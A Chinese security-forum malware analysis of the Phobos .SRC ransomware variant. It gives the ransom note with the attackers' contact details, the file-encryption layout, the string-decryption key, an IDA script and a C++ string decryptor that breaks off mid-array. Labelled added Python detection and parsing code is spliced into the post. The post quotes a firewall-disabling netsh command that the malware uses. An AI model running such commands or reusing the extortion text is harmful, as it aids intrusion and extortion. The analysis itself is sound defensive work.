吾爱破解 - 52pojie.cn

[PC Sample Analysis] [Malware Analysis] In-depth analysis of the new Phobos family variant .SRC: a continuously evolving ransomware threat

solar应急响应 posted on 2024-10-17 17:34
This post was last edited by Solarsec on 2024-10-18 09:20

1. Background

Since early 2019 the Phobos ransomware family has, through constant updates and evolution, become a serious threat worldwide. Phobos spreads mainly through RDP brute-forcing and phishing e-mails, targets both enterprises and individual users, and its infection count keeps rising. Phobos is commonly regarded as an upgraded version of the Dharma (CrySis) ransomware: its encryption scheme, part of its code and the format of its ransom note closely resemble CrySis. The new .SRC variant, however, shows some distinctive traits, such as different ransom-note content and differences in how certain folders and file types are handled, reflecting how the family keeps diverging as it evolves.

1.1 Technical characteristics

The Phobos .SRC variant inherits many technical characteristics of Phobos ransomware while also introducing some improvements and changes. Its main technical characteristics are:

  • Encryption scheme: Phobos uses a hybrid AES-256 / RSA-1024 system. AES encrypts the file contents symmetrically and RSA encrypts the critical key asymmetrically, so that the encrypted files cannot be recovered without the attacker's private key.
  • Persistence and privilege escalation: to keep the infection persistent, Phobos registers itself in the Windows startup folder and in the registry Run key, and uses tools such as Smokeloader for process injection so that the malicious code hides inside legitimate processes and evades security software.
  • Defense evasion: Phobos uses built-in Windows commands (such as netsh firewall set opmode mode=disable) to disable the firewall, and uses tools such as Process Hacker and PowerTool to evade system defenses. It also deletes volume shadow copies to prevent victims from recovering data through System Restore.
  • Credential access and data collection: the attackers use tools such as Mimikatz, Bloodhound and NirSoft utilities to extract credentials and domain account information from infected systems for privilege escalation and lateral movement.
  • Encryption targets: Phobos encrypts all files but skips specific file types and paths, which speeds up encryption and reduces the risk of breaking the system. It queries the system locale through the Windows API and, if the victim system uses a particular language setting (such as Russian), aborts the infection to avoid attacking that region.
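As an added illustration of the defense-evasion and persistence behaviours listed above (this is added example code, not part of the original post or of the sample), here is a small detection routine run over constructed process-creation and registry events. The event shape, field names, user name and image paths are assumptions; the advfirewall pattern generalises beyond the single netsh firewall command named above to the newer syntax for the same action, and the "autostart entry pointing into a user-writable directory" heuristic is an assumption of this example, not something the analysis states.

```python
import re

# Constructed events (not real telemetry) in a minimal EDR/Sysmon-like shape:
# one dict per process-creation or registry-value-set event. The image paths,
# value names and user name are made up for this example.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh firewall set opmode mode=disable"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "SRC_Visual", "data": r"C:\Users\victim\AppData\Local\SRC_Visual.exe"},
    {"type": "process", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh interface show interface"},            # benign netsh use
    {"type": "registry", "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "OneDrive", "data": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"},
]

# Legacy syntax quoted in the analysis plus the newer advfirewall form of the same action.
FIREWALL_DISABLE = re.compile(
    r"netsh\s+(?:firewall\s+set\s+opmode\s+(?:mode=)?disable"
    r"|advfirewall\s+set\s+\w+\s+state\s+off)", re.IGNORECASE)
# Run / RunOnce autostart keys under HKCU or HKLM.
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?$", re.IGNORECASE)
# Heuristic (assumption): autostart entries pointing into user-writable locations are suspect.
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Users\\Public)\\", re.IGNORECASE)


def detect(events):
    """Return (rule, evidence) tuples for events matching the behaviours above."""
    findings = []
    for ev in events:
        if ev["type"] == "process" and FIREWALL_DISABLE.search(ev["cmdline"]):
            findings.append(("defense_evasion.firewall_disable", ev["cmdline"]))
        elif (ev["type"] == "registry" and RUN_KEY.search(ev["key"])
              and USER_WRITABLE.search(ev["data"])):
            findings.append(("persistence.run_key_user_writable",
                             f'{ev["key"]}\\{ev["value"]} -> {ev["data"]}'))
    return findings


if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {evidence}")
```

Both rules are deliberately narrow: a benign netsh invocation and a Run-key entry under Program Files produce no finding, so the routine can be dropped into an existing alert pipeline without flooding it with every netsh or autostart event.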

1.2 Contact details and file extension

In the latest Phobos .SRC variant the ransom note is presented differently. Earlier typical ransom notes were generated in two file formats, info.txt and info.hta, and placed in every infected folder. In the .SRC variant the note becomes +README-WARNING+.txt and no .hta file is produced. The contact e-mail has also changed, to chewbacca@cock.li, and a Tor contact channel has been added for greater anonymity.

The ransom note content has also been substantially revised. Compared with older Phobos notes, the .SRC note is far more detailed and no longer just a few lines of notice. Instead it takes an FAQ form that walks the victim through contacting the attackers, stressing that this is the "sensible" choice. This change suggests the Phobos family is paying more attention to how it communicates with victims and is working harder to convince them that paying the ransom is the only way to recover their data.

2. Basic information on the malicious file

2.1 Encryptor basic information

File name: SRC_Visual.exe
Compiler: Microsoft Visual C/C++(14.00.50727)[LTCG/C++]
Size: 50176 (49.00 KiB)
Operating system: Windows(95)
Architecture: I386
Mode: 32-bit
Type: GUI
Endianness: LE
MD5: a60e2c0dec417d2dabe40c003f39c4f2
SHA1: 4e7dc90c06429690c189097dac853d52812a2344
SHA256: 52d89ac9f3b1c74c978618f81b9323ffa8d4b8ace29b12f82bade43fca90719e

2.3 Ransom note

+README-WARNING+.txt

::: Greetings :::

Little FAQ:

.1. 
Q: Whats Happen?
A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen.

.2. 
Q: How to recover files?
A: If you wish to decrypt your files you will need to pay us.

.3. 
Q: What about guarantees?
A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests.
To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.

.4.
Q: How to contact with you?
A: You can write us to our mailbox: chewbacca@cock.li
Or you can contact us via TOX: ADA6E26332F26451E45768179C771CA87A7F0F4E234DA8D882888F505494925DCF274A3EA555
You don't know about TOX? Go to https://tox.chat

.5.
Q: How will the decryption process proceed after payment?
A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files.

.6.
Q: If I don’t want to pay bad people like you?
A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money.

:::BEWARE:::
DON'T try to change encrypted files by yourself! 
If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files!
Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.

3. Analysis of encrypted files

3.1 Threat analysis

Malware family: Phobos
First seen / captured and analysed: 2019/05 || 2024/08/14
Threat type: ransomware, file-encrypting malware
Encrypted file extension: [C0C5CE62].[hudsonL@cock.li].SRC
Ransom note file name: +README-WARNING+.txt
Free decryptor available?
Contact e-mail: chewbacca@cock.li
Detection names: Avast (Win32:Malware-gen), AhnLab-V3 (Trojan/Win.Generic.C5576951), ALYac (Gen:Variant.Tedy.512515), Avira (no cloud) (TR/Ransom.imrnt), BitDefenderTheta (Gen:NN.ZexaF.36802.yq0@aSdxC8m), CrowdStrike Falcon (Win/malicious_confidence_100% (W)), Cylance (Unsafe), DeepInstinct (MALICIOUS), Emsisoft (Gen:Variant.Tedy.512515 (B)), ESET-NOD32 (A Variant Of MSIL/Filecoder.LU), GData (Gen:Variant.Tedy.512515), Ikarus (Trojan.MSIL.Crypt), K7GW (Trojan ( 0052f4e41 ))
Symptoms of infection: files stored on the computer cannot be opened; files that previously worked now carry a different extension (for example solar.docx.locked). A ransom demand is shown on the desktop. The cybercriminals demand a ransom (usually in Bitcoin) to unlock your files.
Infection vectors: infected e-mail attachments (macros), malvertising, exploits, malicious links
Impact: all files are encrypted and cannot be opened without paying the ransom. Additional password-stealing trojans and other malware may be installed alongside the ransomware.

3.2 Encrypted test file

3.2.1 File name

sierting.txt

3.2.2 File size

0x228 bytes

3.2.3 Contents


Hex:

3.3 Encryption characteristics

3.3.1 Encrypted file name pattern

Encrypted file name = original file name + encrypted-file suffix, for example: sierting.txt.[F2479DE1].[chewbacca@cock.li].SRC

3.3.2 Encrypted data layout

File size <= 0x40000 bytes (fully encrypted):

data of the original file size (encrypted) + 0 to 16 bytes of variable-length padding + 8 bytes of \xff + variable-length encrypted file-name structure + 4-byte length of the encrypted file-name structure + 16-byte IV + 128-byte RSA-encrypted AES key + 4-byte fixed value + 4-byte encryption flag


File size > 0x40000 bytes (partially encrypted):


0x40000 bytes of encrypted data + the remaining original data + variable-length encrypted file-name structure + 4-byte length of the encrypted file-name structure + 16-byte IV + 128-byte RSA-encrypted AES key + 4-byte fixed value + 4-byte encryption flag
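The file-name pattern in 3.3.1 and the trailer layout in 3.3.2, as an added forensic example (added code, not part of the original post or of the sample): a parser that takes an encrypted file apart from the end and recovers the IV, the RSA-encrypted AES key and the remaining fields, together with a check of the encrypted-file-name pattern. Assumptions: the 4-byte length field is little-endian; the analysis does not give the values of the fixed value and flag fields, so placeholders are used; and the synthetic files assembled by build_sample contain stand-in bytes instead of real AES-CBC ciphertext, because only the layout is being exercised.

```python
import re
import struct

# Layout constants taken from the analysis above.
MARKER = b"\xff" * 8                 # 8-byte 0xFF run after the padded ciphertext (full-encryption layout)
PARTIAL_LIMIT = 0x40000              # larger files get only their first 0x40000 bytes encrypted
TRAILER_LEN = 4 + 16 + 128 + 4 + 4   # name-struct length + IV + RSA(AES key) + fixed value + flag

# Encrypted-name pattern: <original>.[8-hex-digit ID].[contact e-mail].SRC
SRC_NAME = re.compile(r"^(?P<original>.+)\.\[(?P<victim_id>[0-9A-F]{8})\]\.\[(?P<contact>[^\]]+)\]\.SRC$")


def parse_src_name(name: str):
    """Return the original name, victim ID and contact address, or None if not a .SRC name."""
    m = SRC_NAME.match(name)
    return m.groupdict() if m else None


def parse_src_file(blob: bytes) -> dict:
    """Split an encrypted file into its components, walking backwards from the end."""
    if len(blob) < TRAILER_LEN:
        raise ValueError("too short to hold a .SRC trailer")
    trailer = blob[-TRAILER_LEN:]
    (name_len,) = struct.unpack("<I", trailer[:4])          # assumed little-endian
    iv, enc_key = trailer[4:20], trailer[20:148]            # 16-byte IV, 128-byte RSA-encrypted AES key
    fixed, flag = trailer[148:152], trailer[152:156]
    rest = blob[:-TRAILER_LEN]
    if name_len > len(rest):
        raise ValueError("name-structure length exceeds file size")
    name_struct = rest[len(rest) - name_len:]
    body = rest[:len(rest) - name_len]
    # Full layout: padded ciphertext followed by the 0xFF marker. Partial layout:
    # 0x40000 bytes of ciphertext followed by the untouched remainder of the file.
    if body.endswith(MARKER) and len(body) - len(MARKER) <= PARTIAL_LIMIT + 16:
        mode, ciphertext, tail = "full", body[:-len(MARKER)], b""
    elif len(body) > PARTIAL_LIMIT:
        mode, ciphertext, tail = "partial", body[:PARTIAL_LIMIT], body[PARTIAL_LIMIT:]
    else:
        raise ValueError("small file without the 0xFF marker: not the documented layout")
    return {"mode": mode, "ciphertext": ciphertext, "plaintext_tail": tail,
            "name_struct": name_struct, "iv": iv, "enc_key": enc_key,
            "fixed": fixed, "flag": flag}


def build_sample(original: bytes, name_struct: bytes, iv: bytes, enc_key: bytes,
                 fixed: bytes, flag: bytes) -> bytes:
    """Assemble a synthetic file in the documented layout. No encryption is performed:
    the 'ciphertext' is the input plus block padding, a stand-in for real AES-CBC output."""
    if len(iv) != 16 or len(enc_key) != 128 or len(fixed) != 4 or len(flag) != 4:
        raise ValueError("field sizes must match the layout")
    if len(original) <= PARTIAL_LIMIT:
        pad = 16 - len(original) % 16                       # pad up to the AES block size
        body = original + bytes([pad]) * pad + MARKER
    else:
        body = original                                     # first 0x40000 bytes would be ciphertext
    return body + name_struct + struct.pack("<I", len(name_struct)) + iv + enc_key + fixed + flag


if __name__ == "__main__":
    # Placeholder field values: the real fixed value and flag are not given in the analysis.
    sample = build_sample(b"A" * 100, b"N" * 48, b"I" * 16, b"K" * 128, b"\x00" * 4, b"\x00" * 4)
    parsed = parse_src_file(sample)
    print(parsed["mode"], len(parsed["ciphertext"]), parsed["iv"].hex())
    print(parse_src_name("sierting.txt.[F2479DE1].[chewbacca@cock.li].SRC"))
```

Walking the trailer from the end is what makes the parser usable on real samples: the IV and the RSA-encrypted AES key sit at fixed negative offsets, so they can be extracted and archived for every affected file even when the original size and the name-structure length are unknown up front.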

3.3.3 Encryption algorithm

File encryption uses AES-CBC; the AES key used for file encryption is itself encrypted with RSA.

Decryption of the strings inside the program uses AES in ECB mode.

AES key generation
KEY

Generated by the produce_random_key function; see the key-generation section for the full implementation. Part of it is shown here:


As can be seen, the KEY is a 32-byte random value, and the random number generator is CryptGenRandom.

IV

See the file-encryption section for this part; the IV is generated mainly by the produce_random function. Part of the implementation is shown here:


As can be seen, the IV is a 16-byte random value, again generated with CryptGenRandom.

RSA key generation
Public key

Obtained by decrypting the string at offset flag 0xa; it comes with its own BLOB structure, shown below:

0602000000a400005253413100040000010001001d35622bcfbcfe4fde59eae15c05d7528d0c1ae6755c180904dd745cd1f5a19986fce1e0e9534595e4fb7bdd6d5cc1f2cee684851bfc59529108c433185cf76c800f421aad345aa6a964e8f485acf1d3965c85654b124257e0142269eab809af68692309843ce7cd4fa8bf3124926f0403a7502abbecfa2ba7504e63a958e7bd000000000000000000000000

3.3.4 Files dropped by the encryptor

Ransom note (+README-WARNING+.txt)
File contents

(identical to the note reproduced in section 2.3 above)

Composition analysis

All of the ransom note text is obtained by decrypting the string at offset flag 0x8; it has no relation to the encryption ID.

Ransom wallpaper (xxx.tmp.bmp)
File contents

Composition analysis

The string "Your files were encrypted!", obtained by decrypting the string at offset flag 0x3a, is drawn onto the specified canvas.

4. Reverse engineering analysis

4.1 Encryptor reverse analysis

4.1.1 Program entry

On opening the program we find that it first calls sub_407A90 to check the privileges of the executing user, then calls sub_4077D0 to validate the launch parameters, then calls init_enc_obj to initialise the encryption object and decrypt some of the strings, and finally uses the earlier results to decide whether it is running as administrator and whether the supplied parameters are valid; if not, it exits.


Once these checks pass, Init_GUI is called to display the program window, from which the various events are triggered according to the user's choices.

4.1.2 Checking launch privileges (sub_407A90)

This is a fairly conventional administrator check.

4.1.3 Checking launch parameters (sub_4077D0)

This mainly inspects the launch parameters and returns a fixed value depending on whether a parameter is present and what its value is:

Return value 0: no parameter

Return value 1: parameter is e

Return value 2: parameter is n followed by a string of digits

4.1.4 String decryption (sub_402950)

Logic analysis

This is the first real algorithm encountered in the program. Pick any of the string-decryption call sites and the same pattern appears: every string decryption is driven by an offset flag, each flag corresponding to one string. This is one of the classic Phobos family tricks.


Having analysed several Phobos variants, we find that the string decryption differs somewhat from version to version. This variant still uses AES-256 in ECB mode for decryption, but the implementation is clearly custom; inside the function, the exact algorithm and mode can be determined from the BLOB structure of the imported key.


Starting from the external call sites, we again see the familiar offset-flag lookup: the flag is used to locate the length and the ciphertext position of the corresponding string.

The provider type is PROV_RSA_AES, and CryptImportKey is then called to import the key. A BLOB structure precedes the key import, and the exact algorithm can be identified from that structure.

AES key (string decryption):

8C93C36117EE77655080C789D0B92C73C91F1FDA560942CA72AA3DB5AC4CACB1
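The point made above and in 3.3.3, that the algorithm can be read straight off the key BLOB handed to CryptImportKey, as an added example (added code, not part of the original post or of the sample): a parser for the CryptoAPI BLOBHEADER and the key material that follows it, run on the RSA public-key BLOB from 3.3.3 and on a PLAINTEXTKEYBLOB built around the string-decryption AES key above in the same way the C++ decryptor in this section does. The constants are the real wincrypt.h values; the only assumption is that the twelve trailing zero bytes of the dumped RSA BLOB are slack rather than key data.

```python
import struct

# wincrypt.h constants (real Windows values)
BLOB_TYPES = {0x01: "SIMPLEBLOB", 0x06: "PUBLICKEYBLOB",
              0x07: "PRIVATEKEYBLOB", 0x08: "PLAINTEXTKEYBLOB"}
ALG_IDS = {0x660E: "CALG_AES_128", 0x660F: "CALG_AES_192", 0x6610: "CALG_AES_256",
           0x2400: "CALG_RSA_SIGN", 0xA400: "CALG_RSA_KEYX"}

# RSA public-key BLOB decrypted from offset flag 0xa, copied from the analysis above.
RSA_PUBLIC_BLOB = bytes.fromhex(
    "0602000000a400005253413100040000"   # BLOBHEADER (PUBLICKEYBLOB, v2, CALG_RSA_KEYX), "RSA1", 1024 bits
    "01000100"                           # public exponent 65537
    "1d35622bcfbcfe4fde59eae15c05d752"   # 128-byte modulus, little-endian
    "8d0c1ae6755c180904dd745cd1f5a199"
    "86fce1e0e9534595e4fb7bdd6d5cc1f2"
    "cee684851bfc59529108c433185cf76c"
    "800f421aad345aa6a964e8f485acf1d3"
    "965c85654b124257e0142269eab809af"
    "68692309843ce7cd4fa8bf3124926f04"
    "03a7502abbecfa2ba7504e63a958e7bd"
    "000000000000000000000000")          # trailing slack bytes as dumped (assumed not key data)

# AES-256 key used for string decryption, as given in the analysis above.
STRING_AES_KEY = bytes.fromhex("8C93C36117EE77655080C789D0B92C73C91F1FDA560942CA72AA3DB5AC4CACB1")


def parse_key_blob(blob: bytes) -> dict:
    """Decode the BLOBHEADER and the key material that follows it."""
    if len(blob) < 8:
        raise ValueError("shorter than a BLOBHEADER")
    b_type, b_version, reserved, alg_id = struct.unpack("<BBHI", blob[:8])
    info = {"type": BLOB_TYPES.get(b_type, f"unknown(0x{b_type:02x})"),
            "version": b_version,
            "alg": ALG_IDS.get(alg_id, f"unknown(0x{alg_id:08x})")}
    if b_type == 0x08:                          # PLAINTEXTKEYBLOB: DWORD key length, then the raw key
        (key_len,) = struct.unpack("<I", blob[8:12])
        key = blob[12:12 + key_len]
        if len(key) != key_len:
            raise ValueError("truncated PLAINTEXTKEYBLOB")
        info["key"] = key
    elif b_type in (0x06, 0x07):                # RSAPUBKEY header, then the modulus (little-endian)
        if len(blob) < 20:
            raise ValueError("truncated RSAPUBKEY header")
        magic, bitlen, pubexp = struct.unpack("<4sII", blob[8:20])
        if magic != (b"RSA1" if b_type == 0x06 else b"RSA2"):
            raise ValueError(f"unexpected RSA magic {magic!r}")
        n_len = bitlen // 8
        modulus_le = blob[20:20 + n_len]
        if len(modulus_le) != n_len:
            raise ValueError("truncated RSA modulus")
        info.update(bits=bitlen, exponent=pubexp,
                    modulus=int.from_bytes(modulus_le, "little"))
        # A PRIVATEKEYBLOB continues with p, q, dp, dq, iqmp and d; not decoded here.
    return info


def make_plaintext_key_blob(key: bytes, alg_id: int = 0x6610) -> bytes:
    """Build the PLAINTEXTKEYBLOB layout (header, DWORD length, raw key) used for CryptImportKey."""
    return struct.pack("<BBHII", 0x08, 0x02, 0, alg_id, len(key)) + key


if __name__ == "__main__":
    rsa = parse_key_blob(RSA_PUBLIC_BLOB)
    print(rsa["type"], rsa["alg"], rsa["bits"], "bits, e =", rsa["exponent"])
    aes = parse_key_blob(make_plaintext_key_blob(STRING_AES_KEY))
    print(aes["type"], aes["alg"], aes["key"].hex())
```

Reading the header this way gives the same answer as stepping into the import call in the debugger: bType 0x06 with magic "RSA1" and aiKeyAlg 0xa400 is an RSA key-exchange public key of 1024 bits, and bType 0x08 with aiKeyAlg 0x6610 is a raw AES-256 key, which is exactly what the string decryptor imports.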


Once the key has been imported, the ciphertext is decrypted.


Here we write an IDA Python script to extract all of the ciphertext data and flags:

```python
import idc

# Base of the string table: 0x2d (45) entries of 8 bytes each.
# Byte 0 of each entry is the offset flag; the WORDs at +2 and +4 are the start
# and end offsets of that string's ciphertext, relative to the table base.
# read_dbg_* reads live process memory, so run this with the sample suspended
# under the IDA debugger (inside an isolated analysis VM).
addr = 0x41F000
sum_cipher = []
for i in range(0, 0x2d):
    data_addr = addr + 8 * i
    flag = hex(idc.read_dbg_byte(data_addr))
    start = idc.read_dbg_word(data_addr + 2)
    length = idc.read_dbg_word(data_addr + 4) - start   # renamed from len: do not shadow the builtin
    cipher = []
    for k in range(length):
        cipher.append(idc.read_dbg_byte(addr + start + k))
    sum_cipher.append(cipher)
    print(flag, cipher)
    print('-' * 100)
```

Then process the data (starting from flag 0) and build a C++ program to decrypt it:

#include <windows.h>
#include <wincrypt.h>
#include <cstring>    // memcpy
#include <iostream>
#include <vector>
#include <sstream>
#include <iomanip>
#pragma comment(lib, "advapi32.lib")   // CryptoAPI import library for MSVC
void PrintHex(const std::vector<BYTE>& data) {
    std::cout << "Hex: ";
    for (BYTE b : data) {
        std::cout << std::hex << std::setw(2) << std::setfill('0') << (int)b;
    }
    std::cout << std::endl;
}

int main() {
    HCRYPTPROV hProv = NULL;
    HCRYPTKEY hKey = NULL;
    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        std::cout << "Failed to acquire crypto context!" << std::endl;
        return 1;
    }
    unsigned char key[32] = {
        0x8C, 0x93, 0xC3, 0x61, 0x17, 0xEE, 0x77, 0x65, 0x50, 0x80,
        0xC7, 0x89, 0xD0, 0xB9, 0x2C, 0x73, 0xC9, 0x1F, 0x1F, 0xDA,
        0x56, 0x09, 0x42, 0xCA, 0x72, 0xAA, 0x3D, 0xB5, 0xAC, 0x4C,
        0xAC, 0xB1
    };
    struct {
        BLOBHEADER hdr;
        DWORD keySize;
        BYTE keyData[32];
    } keyBlob;
    keyBlob.hdr.bType = PLAINTEXTKEYBLOB;
    keyBlob.hdr.bVersion = CUR_BLOB_VERSION;
    keyBlob.hdr.reserved = 0;
    keyBlob.hdr.aiKeyAlg = CALG_AES_256;
    keyBlob.keySize = 32;
    memcpy(keyBlob.keyData, key, 32);
    // Offset flags of the extracted strings, in the same order as cipher_list below
    std::vector<std::string> sign_list = { "0x0", "0x1", "0x4", "0x5", "0x6", "0x7", "0x8", "0x9", "0xa", "0xc", "0xe", "0xf", "0x10", "0x11", "0x12", "0x13", "0x14", "0x16", "0x17", "0x18", "0x19", "0x1a", "0x1b", "0x1e", "0x1f", "0x20", "0x21", "0x22", "0x23", "0x24", "0x25", "0x26", "0x27", "0x28", "0x29", "0x2a", "0x2b", "0x2c", "0x33", "0x36", "0x37", "0x38", "0x39", "0x3a" };
    std::vector<std::vector<BYTE>> cipher_list = { 
        {84, 193, 164, 131, 219, 130, 47, 108, 192, 20, 48, 116, 31, 202, 206, 31, 45, 132, 42, 178, 65, 215, 203, 28, 93, 184, 43, 117, 78, 237, 248, 206}, {205, 64, 217, 196, 63, 9, 44, 9, 32, 203, 49, 156, 87, 2, 229, 192, 14, 183, 145, 174, 109, 239, 47, 175, 41, 89, 206, 231, 223, 102, 191, 13, 255, 204, 188, 186, 210, 176, 6, 8, 110, 232, 254, 109, 118, 217, 78, 57, 158, 125, 43, 169, 138, 255, 110, 33, 149, 64, 176, 49, 153, 106, 79, 208}, 
        {115, 228, 119, 26, 133, 194, 217, 50, 140, 71, 43, 242, 116, 74, 143, 37, 208, 175, 234, 92, 156, 221, 229, 239, 183, 235, 157, 27, 197, 252, 116, 193, 129, 8, 105, 72, 249, 190, 174, 42, 85, 197, 181, 37, 184, 148, 156, 79, 16, 180, 57, 73, 69, 57, 244, 223, 183, 5, 172, 121, 226, 104, 8, 207, 104, 149, 188, 150, 207, 173, 233, 11, 182, 16, 16, 96, 226, 157, 113, 183, 191, 75, 238, 170, 44, 115, 0, 215, 213, 227, 94, 153, 62, 19, 15, 245, 102, 108, 148, 54, 79, 141, 48, 109, 69, 25, 169, 99, 210, 62, 139, 58, 52, 38, 195, 4, 125, 77, 253, 132, 136, 83, 163, 202, 174, 61, 177, 136, 170, 162, 186, 37, 195, 209, 93, 172, 38, 223, 26, 194, 101, 55, 249, 168, 208, 58, 190, 123, 56, 115, 1, 227, 50, 223, 107, 220, 31, 168, 173, 133, 171, 179, 82, 15, 10, 127, 251, 173, 187, 49, 213, 191, 149, 201, 93, 54, 187, 124, 207, 180, 186, 26, 55, 212, 102, 29, 97, 215, 76, 198, 188, 17},
        {222, 55, 116, 106, 205, 240, 172, 80, 144, 36, 154, 125, 243, 40, 137, 67, 242, 106, 3, 192, 230, 18, 88, 45, 138, 203, 130, 141, 255, 206, 44, 196, 102, 200, 233, 123, 44, 15, 163, 29, 159, 34, 139, 36, 233, 181, 55, 138, 73, 231, 255, 89, 123, 127, 226, 171, 187, 66, 102, 214, 42, 138, 31, 146, 24, 220, 180, 89, 206, 36, 47, 58, 169, 128, 102, 212, 139, 165, 184, 246, 242, 203, 51, 33, 247, 235, 206, 147, 165, 134, 240, 14, 97, 152, 221, 55, 72, 204, 140, 107, 155, 57, 33, 147, 169, 23, 61, 86, 34, 160, 138, 160, 53, 122, 51, 154, 19, 108, 152, 195, 74, 243, 64, 81, 231, 96, 235, 61, 222, 207, 140, 216, 39, 79, 16, 124, 117, 85, 195, 237, 174, 50, 49, 169, 21, 157, 216, 39, 175, 185, 87, 175, 185, 78, 225, 68, 131, 211, 161, 5, 199, 178, 175, 110, 57, 43, 202, 237, 8, 38, 229, 175, 240, 221, 234, 22, 113, 33, 159, 75, 206, 161, 164, 199, 129, 6, 15, 146, 198, 218, 102, 66, 238, 102, 84, 67, 21, 62, 5, 74, 189, 47, 246, 126, 25, 197, 166, 136, 150, 180, 237, 145, 15, 14, 81, 83, 28, 131, 178, 6, 116, 71, 129, 10, 48, 74, 174, 74, 179, 248, 134, 41, 225, 100, 161, 133, 65, 16, 176, 249, 209, 89, 212, 4, 73, 131, 128, 140, 185, 190, 80, 204, 214, 41, 183, 208, 61, 130, 53, 115, 177, 246, 27, 174, 13, 127, 218, 158, 42, 63, 201, 237, 22, 201, 231, 92, 9, 151, 180, 165, 113, 66, 57, 4, 153, 102, 56, 239, 24, 136, 195, 251, 23, 99, 99, 112, 139, 221, 39, 9, 225, 168, 220, 107, 210, 95, 127, 83, 6, 156, 124, 60, 246, 100, 54, 194, 110, 59, 227, 65, 232, 39, 119, 177, 195, 89, 172, 148, 229, 131, 92, 47, 52, 169, 2, 77, 223, 179, 233, 41, 21, 204, 0, 85, 160, 103, 243, 112, 213, 70, 174, 248, 255, 28, 176, 17, 114, 204, 152, 97, 250, 181, 127, 84, 49, 236, 52, 4, 207, 141, 234, 22, 20, 12, 151, 241, 143, 113, 219, 207, 216, 45, 199, 218, 235, 12, 142, 161, 97, 62, 208, 19, 82, 179, 109, 119, 184, 213, 216, 222, 23, 29, 192, 79, 127, 209, 111, 155, 171, 133, 110, 254, 188, 75, 22, 117, 33, 166, 105, 146, 230, 134, 184, 233, 46, 110, 150, 94, 222, 27, 250, 42, 
141, 230, 24, 173, 165, 11, 46, 80, 101, 140, 74, 190, 118, 157, 133, 133, 111, 69, 211, 96, 83, 148, 160, 230, 148, 96, 104, 79, 204, 164, 9, 119, 33, 189, 150, 180, 206, 83, 201, 149, 17, 111, 15, 19, 130, 169, 253, 16, 178, 47, 242, 181, 203, 111, 250, 156, 212, 177, 157, 44, 44, 228, 76, 61, 203, 146, 68, 127, 156, 10, 0, 121, 113, 32, 254, 96, 115, 249, 208, 239, 251, 146, 179, 26, 6, 99, 22, 46, 255, 175, 121, 42, 5, 223, 234, 145, 115, 201, 199, 155, 76, 76, 244, 5, 39, 97, 249, 52, 71, 52, 23, 235, 255, 187, 194, 0, 52, 239, 14, 158, 34, 206, 51, 255, 167, 208, 121, 36, 70, 7, 147, 100, 122, 46, 105, 219, 244, 212, 77, 137, 205, 241, 61, 23, 247, 184, 247, 16, 22, 238, 176, 33, 171, 13, 250, 131, 18, 28, 189, 226, 86, 219, 21, 90, 99, 238, 212, 7, 58, 7, 225, 187, 159, 115, 67, 136, 87, 111, 131, 46, 99, 209, 80, 45, 64, 163, 104, 40, 29, 84, 238, 36, 150, 1, 18, 5, 10, 69, 160, 220, 38, 216, 237, 232, 225, 18, 246, 104, 39, 54, 58, 83, 88, 109, 61, 228, 77, 188, 14, 206, 25, 15, 172, 135, 69, 24, 75, 85, 42, 17, 109, 132, 235, 52, 113, 5, 222, 33, 38, 241, 229, 76, 235, 221, 227, 52, 0, 196, 130, 239, 73, 130, 254, 70, 102, 230, 145, 84, 94, 76, 190, 140, 220, 34, 113, 202, 141, 77, 141, 80, 161, 94, 111, 124, 118, 63, 124, 91, 211, 45, 178, 205, 64, 159, 155, 157, 30, 69, 242, 141, 225, 107, 207, 122, 56, 221, 96, 69, 168, 56, 131, 176, 30, 69, 95, 78, 38, 139, 48, 203, 14, 133, 166, 61, 8, 86, 217, 70, 158, 73, 153, 172, 52, 13, 210, 249, 252, 106, 119, 245, 87, 4, 247, 198, 35, 138, 162, 251, 164, 201, 40, 13, 33, 27, 101, 114, 228, 167, 182, 62, 47, 79, 36, 18, 116, 237, 159, 181, 244, 147, 7, 77, 228, 144, 171, 236, 249, 110, 237, 118, 67, 84, 8, 141, 11, 40, 122, 163, 163, 111, 88, 221, 251, 133, 158, 159, 139, 119, 109, 119, 223, 212, 2, 112, 152, 253, 133, 245, 209, 62, 203, 255, 24, 91, 4, 123, 104, 212, 253, 13, 164, 58, 48, 233, 37, 14, 201, 209, 177, 47, 59, 162, 223, 210, 15, 119, 86, 69, 174, 151, 201, 55, 45, 5, 142, 252, 215, 79, 25, 187, 
